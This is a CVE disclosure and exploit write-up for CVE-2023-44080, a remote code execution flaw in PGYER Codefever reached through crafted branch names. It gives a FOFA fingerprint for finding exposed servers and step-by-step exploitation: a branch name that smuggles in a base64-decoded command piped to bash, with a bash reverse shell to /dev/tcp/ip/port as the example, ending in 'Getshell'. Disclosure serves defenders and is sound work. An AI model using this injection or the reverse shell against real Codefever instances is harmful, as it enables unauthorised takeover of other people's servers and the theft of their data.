Headline
CVE-2023-44080: CVE-2023-44080.md
An issue in PGYER codefever v.2023.8.14-2ce4006 allows a remote attacker to execute arbitrary code via a crafted request to the branchList component.
Remote Code Execution Vulnerability in Codefever up to 2023.8.14-2ce4006
CVE-ID: CVE-2023-44080
Attack type: Remote Code Execution
FOFA Keyword: icon_hash="-391103642"
Date: August 13, 2023
Exploit Author: pyy
Vendor Homepage: https://www.pgyer.com/ https://codefever.pgyer.com/
Software Link: https://github.com/PGYER/codefever
Version: up to 2023.8.14-2ce4006
Suggested description of the vulnerability for use in the CVE: Codefever up to 2023.8.14-2ce4006 was discovered to contain a remote code execution (RCE) vulnerability via the component /application/controllers/api/repository.php
By default, arbitrary remote code execution (RCE) can be achieved on Codefever either by directly registering a new account(by default, Codefever allows arbitrary users to register new accounts), or by obtaining a low-privilege account on the target system which allows creating a new branch for any project.
EXP
The attack can be carried out by following these steps:
Register an account (default abled for anyone) and Create a repository (an existing repository can also be used)
Clone the repository and create a normal branch, then push it
Create a branch with the branch name containing exploit code
git checkout -b “&&echo$IFS$9{{command}}|base64$IFS$9-d|bash&&”
The command is the base64 encoding of any command to be executed. For example, bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’ base64 encoded.
Then create a pull request (press 合并请求 on the page)
Getshell
More Information
Browse this for more information. (I can not upload photos to github gist)